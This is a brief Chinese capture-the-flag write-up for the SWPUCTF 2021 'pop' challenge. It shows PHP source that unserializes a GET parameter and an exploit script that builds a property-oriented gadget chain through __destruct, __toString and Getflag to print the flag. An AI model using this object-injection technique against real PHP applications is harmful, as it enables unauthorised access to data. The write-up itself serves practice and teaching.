[SWPUCTF 2021 新生赛]pop

题目：

<?php

error_reporting(0);
show_source("index.php");

class w44m{

    private $admin = 'aaa';
    protected $passwd = '123456';

    public function Getflag(){
        if($this->admin === 'w44m' && $this->passwd ==='08067'){
            include('flag.php');
            echo $flag;
        }else{
            echo $this->admin;
            echo $this->passwd;
            echo 'nono';
        }
    }
}

class w22m{
    public $w00m;
    public function __destruct(){
        echo $this->w00m;
    }
}

class w33m{
    public $w00m;
    public $w22m;
    public function __toString(){
        $this->w00m->{$this->w22m}();
        return 0;
    }
}

$w00m = $_GET['w00m'];
unserialize($w00m);

?> 

exp:

<?php

class w44m{
    private $admin = "w44m";
    protected $passwd = '08067';
}

class w22m{
    public $w00m;
}

class w33m{
    public $w00m;
    public $w22m;
}
$solve=new w22m();//为了调用  __destruct
$solve->w00m=new w33m();//_destruct 中的echo 调用 __toString
$solve->w00m->w00m=new w44m();//_toString $this-w00m=new w44m;
$solve->w00m->w22m='Getflag';//_toString $this-w22m=Getflag;
echo urlencode(serialize($solve));
?> 

真的是一环套一环（-_-）